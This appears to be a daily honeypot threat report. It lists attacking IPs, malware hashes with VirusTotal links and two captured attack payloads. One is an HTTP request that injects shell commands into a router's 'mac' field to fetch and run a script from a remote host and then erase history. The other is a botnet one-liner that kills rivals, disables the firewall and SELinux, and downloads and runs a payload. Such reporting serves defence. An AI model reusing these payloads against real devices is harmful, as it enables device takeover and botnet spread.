Top 5 IPs for 2024-01-06:

139.59.147.36
47.180.136.243
87.225.88.9
59.126.175.192
82.162.162.2

Malware download: 
ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
https://www.virustotal.com/gui/file/ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
d88a42a33fabc1b1d761ada585006ad0c79b6918748328e8774774b2db3a3a8f
https://www.virustotal.com/gui/file/d88a42a33fabc1b1d761ada585006ad0c79b6918748328e8774774b2db3a3a8f
d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0
https://www.virustotal.com/gui/file/d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0


Malicious commands seen:

POST /goform/set_LimitClient_cfg HTTP/1.1
Host: <HOST IP>
User-Agent: t.me/DeltaApi
Content-Length: 163
Cookie: user=admin
Accept-Encoding: gzip

time1=00:00-00:00&time2=00:00-00:00&mac=;cd /tmp  cd /run  cd /; wget http://80.66.88.49/niggaa.sh; chmod 777 niggaa.sh; sh niggaa.sh; rm -rf niggaa.sh; history -c

kill -9 $(ps -eo pid,%cpu,cmd --sort=-%cpu | awk 'NR>1 && $3 !~ /^(sh)/ && $2 > 25 && $1 != '$$' {print $1}');pkill -9 -;pkill -9 arm;pkill -9 arm7; pkill -9 x86;pkill -9 x86_64;su 0 rm -rf /data/local;su 0 mkdir /data/local/;su 0 mkdir /data/local/tmp;su 0 chmod 777 /data/local;su 0 chmod 777 /data/local/tmp;chmod 777 /data/local/tmp; cd /data/local/tmp || cd /data/local/.most || cd /data/local/most; rm -rf *;su 0 iptables -F;setenforce 0;busybox wget http://103.72.57.195/and;chmod 777 and;sh and;su 0 mv /data/local/tmp /data/local/.most;su 0 chmod 777 /data/local;su 0 echo hacker > /data/local/tmp;su 0 chmod 444 /data/local;ulimit 999999
